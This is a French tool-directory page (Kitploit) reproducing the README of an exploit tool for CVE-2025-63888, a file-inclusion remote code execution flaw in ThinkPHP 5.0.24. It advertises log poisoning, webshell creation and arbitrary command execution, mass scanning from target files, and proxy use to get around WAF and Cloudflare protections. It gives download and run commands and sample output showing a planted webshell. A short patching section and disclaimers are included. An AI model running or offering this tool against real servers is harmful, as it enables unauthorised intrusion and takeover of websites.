Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-63888-exploit — Outil de recherche en sécurité pour détecter et tester CVE-2025-63888 (ThinkPHP 5.0.24 vulnérabilité d'inclusion de fichier RCE) | Kitploit
Outils/GitHubGitHub/an5i/cve-2025-63888-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

Outil de recherche en sécurité pour détecter et tester CVE-2025-63888 (ThinkPHP 5.0.24 vulnérabilité d'inclusion de fichier RCE)

Voir le dépôt
1042il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-63888 Exploit RCE par Inclusion de Fichier dans ThinkPHP 5.0.24

Un outil de recherche en sécurité pour détecter et tester la vulnérabilité CVE-2025-63888 dans ThinkPHP 5.0.24, qui permet l'exécution de code à distance via des attaques par inclusion de fichier.

⚠️ Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé aux systèmes informatiques est illégal. Utilisez cet outil uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite de tester.

📋 Aperçu

CVE-2025-63888 est une vulnérabilité critique d'exécution de code à distance dans ThinkPHP 5.0.24. La vulnérabilité réside dans la fonction read située dans thinkphp/library/think/template/driver/File.php, permettant aux attaquants d'exécuter du code arbitraire via des attaques par inclusion de fichier en manipulant le chemin du template dans la fonction view().

Score CVSS : 9.8 (Critique)
Version affectée : ThinkPHP 5.0.24 (version exacte)
Fichier vulnérable : thinkphp/library/think/template/driver/File.php méthode


Fonction vulnérable :
read()

🔍 Fonctionnalités

  • Détection automatisée ThinkPHP : Identifie les installations et versions de ThinkPHP
  • Test de vulnérabilité : Teste la vulnérabilité d'inclusion de fichier CVE-2025-63888
  • Découverte de points d'accès : Trouve automatiquement les points d'accès vulnérables
  • Exploitation d'inclusion de fichier : Démontre la capacité d'inclusion de fichier
  • Empoisonnement des fichiers journaux : Tente d'empoisonner les fichiers journaux pour RCE
  • Création de webshell : Crée des webshells via inclusion de fichier
  • Exécution de commandes : Exécute des commandes arbitraires (pour des tests autorisés)
  • Support multi-threading : Scan plusieurs cibles en parallèle
  • Support proxy : Contourner les restrictions WAF/Cloudflare
  • Export JSON : Résultats détaillés au format JSON

📦 Installation

Prérequis

  • Python 3.6 ou supérieur
  • pip (gestionnaire de paquets Python)

Installation rapide

root@kitploit:~
# Clonez le dépôt
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# Installez les dépendances
pip install -r requirements.txt

# Rendez le script exécutable (optionnel)
chmod +x cve_2025_63888_exploit.py

Alternative : Téléchargement direct

root@kitploit:~
# Téléchargez le script
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# Installez les dépendances
pip install requests

🚀 Utilisation

Utilisation de base

root@kitploit:~
# Cible unique
python3 cve_2025_63888_exploit.py -u http://target.com

# Exécuter une commande personnalisée
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# Plusieurs cibles depuis un fichier
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# Avec threading pour un scan plus rapide
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# Sortie verbose pour le débogage
python3 cve_2025_63888_exploit.py -u http://target.com -v

Utilisation de proxies

root@kitploit:~
# Proxy unique
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# Plusieurs proxies depuis un fichier
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

Options de la ligne de commande

root@kitploit:~
-u, --url          URL cible
-f, --file         Fichier contenant les URL cibles (une par ligne)
-c, --command      Commande à exécuter (par défaut : id)
-t, --threads      Nombre de threads (par défaut : 1)
-o, --output       Fichier de sortie (par défaut : uknf_results.json)
-v, --verbose      Activer la journalisation détaillée
--proxy            URL du proxy (ex. http://127.0.0.1:8080)
--proxy-list       Fichier contenant les URL des proxies (une par ligne)

📊 Sortie

Le script génère un fichier JSON avec des résultats détaillés :

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 Fonctionnement

  1. Phase de détection : Scanne les indicateurs du framework ThinkPHP
  2. Détection de version : Tente d'identifier la version de ThinkPHP (5.0.24)
  3. Test de vulnérabilité : Teste la vulnérabilité d'inclusion de fichier
  4. Découverte de points d'accès : Trouve les points d'accès vulnérables utilisant la fonction view()
  5. Exploitation : Démontre la capacité RCE via inclusion de fichier

🛡️ Mesures d'atténuation

Si vous utilisez ThinkPHP 5.0.24 :

  1. Mettez à jour immédiatement :

    • Mettez à jour vers ThinkPHP 5.0.25+ ou ultérieur
    • Ou passez à ThinkPHP 6.x/7.x
  2. Implémentez la validation des chemins :

    • Ajoutez une validation stricte des chemins dans la fonction view()
    • Bloquez les caractères de traversée de répertoire (../, ..)
    • Restreignez les chemins de template aux répertoires autorisés
  3. Correctifs au niveau du code :

    • Validez les chemins de template avant traitement
    • Utilisez realpath() pour garantir que les fichiers se trouvent dans les répertoires autorisés
    • Implémentez une liste blanche de fonctions

📚 Références

  • CVE : CVE-2025-63888
  • GitHub Gist : Détails de CVE-2025-63888
  • Article Yuque : Analyse détaillée
  • Manuel ThinkPHP : Documentation officielle

📖 Exemples

Exemple 1 : Scan d'une cible unique

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com

Exemple 2 : Plusieurs cibles avec sortie

root@kitploit:~
# Créez le fichier des cibles
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Lancez le scan
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

Exemple 3 : Exécution de commande personnalisée

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

Exemple 4 : Utilisation de proxies

root@kitploit:~
# Proxy unique
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Plusieurs proxies depuis un fichier
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 Contribution

Les contributions sont les bienvenues ! N'hésitez pas à soumettre une Pull Request.

  1. Forkez le dépôt
  2. Créez votre branche de fonctionnalité (git checkout -b feature/AmazingFeature)
  3. Commitez vos changements (git commit -m 'Add some AmazingFeature')
  4. Poussez sur la branche (git push origin feature/AmazingFeature)
  5. Ouvrez une Pull Request

🐛 Problèmes

Si vous rencontrez des problèmes ou avez des suggestions, veuillez ouvrir un problème sur GitHub.

📝 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

⭐ Historique d'étoiles

Si vous trouvez cet outil utile, veuillez envisager de lui donner une étoile sur GitHub !

⚖️ Légal

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Les auteurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par ce programme. Les utilisateurs sont responsables de s'assurer qu'ils disposent de l'autorisation appropriée avant de tester tout système.

🙏 Remerciements

  • Rapporteur de la vulnérabilité original : Master-0-0
  • Communauté de sécurité ThinkPHP
  • Chercheurs en sécurité ayant contribué à l'analyse de la vulnérabilité

💰 Dons

Si vous trouvez cet outil utile et souhaitez soutenir le projet :

Bitcoin (BTC) :

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH) :

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Merci pour votre soutien ! 🙏

Télécharger l’outil